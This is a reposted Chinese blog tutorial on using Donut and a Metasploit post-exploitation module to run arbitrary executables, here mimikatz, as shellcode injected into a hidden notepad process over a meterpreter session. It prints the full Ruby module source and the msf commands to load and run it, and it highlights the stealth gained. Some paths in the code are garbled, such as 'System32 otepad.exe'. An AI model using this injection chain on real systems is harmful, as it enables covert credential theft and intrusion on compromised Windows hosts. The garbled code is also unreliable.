Donut和MSF以shellcode注入的方式执行任意文件
Posted chuantouli
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Donut和MSF以shellcode注入的方式执行任意文件相关的知识,希望对你有一定的参考价值。
准备工具
MSF https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
Donut https://github.com/TheWover/donut
准备的shellcode_inject.rb代码
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require ‘msf/core/post/common‘ require ‘msf/core/post/windows/reflective_dll_injection‘ class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super( update_info( info, ‘Name‘ => ‘Windows Manage Memory Shellcode Injection Module‘, ‘Description‘ => %q{ This module will inject into the memory of a process a specified shellcode. }, ‘License‘ => MSF_LICENSE, ‘Author‘ => [ ‘phra <https://iwantmore.pizza>‘ ], ‘Platform‘ => [ ‘win‘ ], ‘SessionTypes‘ => [ ‘meterpreter‘ ] )) register_options( [ OptPath.new(‘SHELLCODE‘, [true, ‘Path to the shellcode to execute‘]), OptInt.new(‘PID‘, [false, ‘Process Identifier to inject of process to inject the shellcode. (0 = new process)‘, 0]), OptBool.new(‘CHANNELIZED‘, [true, ‘Retrieve output of the process‘, true]), OptBool.new(‘INTERACTIVE‘, [true, ‘Interact with the process‘, true]), OptBool.new(‘HIDDEN‘, [true, ‘Spawn an hidden process‘, true]), OptEnum.new(‘BITS‘, [true, ‘Set architecture bits‘, ‘64‘, [‘32‘, ‘64‘]]) ]) end # Run Method for when run command is issued def run # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo[‘Computer‘]}") if not sysinfo.nil? # Set variables shellcode = IO.read(datastore[‘SHELLCODE‘]) pid = datastore[‘PID‘] bits = datastore[‘BITS‘] p = nil if bits == ‘64‘ bits = ARCH_X64 else bits = ARCH_X86 end if pid == 0 or not has_pid?(pid) p = create_temp_proc(bits) print_status("Spawned process #{p.pid}") else print_status("Opening process #{p.pid}") p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) end if bits == ARCH_X64 and client.arch == ARCH_X86 print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") print_error("Migrate to an x64 process and try again.") return false elsif arch_check(bits, p.pid) inject(shellcode, p) end end # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(bits, pid) # get the pid arch client.sys.process.processes.each do |p| # Check Payload Arch if pid == p["pid"] print_status("Process found checking Architecture") if bits == p[‘arch‘] print_good("Process is the same architecture as the payload") return true else print_error("The PID #{ p[‘arch‘]} and Payload #{bits} architectures are different.") return false end end end end # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc(bits) windir = client.sys.config.getenv(‘windir‘) # Select path of executable to run depending the architecture if bits == ARCH_X86 and client.arch == ARCH_X86 cmd = "#{windir}System32 otepad.exe" elsif bits == ARCH_X64 and client.arch == ARCH_X64 cmd = "#{windir}System32 otepad.exe" elsif bits == ARCH_X64 and client.arch == ARCH_X86 cmd = "#{windir}Sysnative otepad.exe" elsif bits == ARCH_X86 and client.arch == ARCH_X64 cmd = "#{windir}SysWOW64 otepad.exe" end proc = client.sys.process.execute(cmd, nil, { ‘Hidden‘ => datastore[‘HIDDEN‘], ‘Channelized‘ => datastore[‘CHANNELIZED‘], ‘Interactive‘ => datastore[‘INTERACTIVE‘] }) return proc end def inject(shellcode, p) print_status("Injecting shellcode into process ID #{p.pid}") begin print_status("Allocating memory in process #{p.pid}") mem = inject_into_process(p, shellcode) print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode") p.thread.create(mem, 0) print_good("Successfully injected payload into process: #{p.pid}") if datastore[‘INTERACTIVE‘] && datastore[‘CHANNELIZED‘] && datastore[‘PID‘] == 0 print_status("Interacting") client.console.interact_with_channel(p.channel) elsif datastore[‘CHANNELIZED‘] print_status("Retrieving output") data = p.channel.read print_line(data) if data end rescue ::Exception => e print_error("Failed to inject Payload to #{p.pid}!") print_error(e.to_s) end end end
1、首先使用Donut对需要执行的文件进行shellcode生成,这里对mimi进行shellcode生成,生成bin文件到tmp目录下,等下会用到
2、将shellcode_inject.rb放入/opt/metasploit-framework/embedded/framework/modules/post/windows/manage下(实际路径可能不同,也就是metasploit-framework的上级路径,根据实际情况调整),然后进入msf,reload_all同时载入所有模块
3、使用之前载入的shellcode_inject注入模块,这里是获取session后的操作了,session先自己上线再进行以下操作
use post/windows/manage/shellcode_inject set session 2 set shellcode /tmp/payload.bin run
最后成功加载了mimi,使用shellcode注入执行,有更强的隐蔽性
以上是关于Donut和MSF以shellcode注入的方式执行任意文件的主要内容,如果未能解决你的问题,请参考以下文章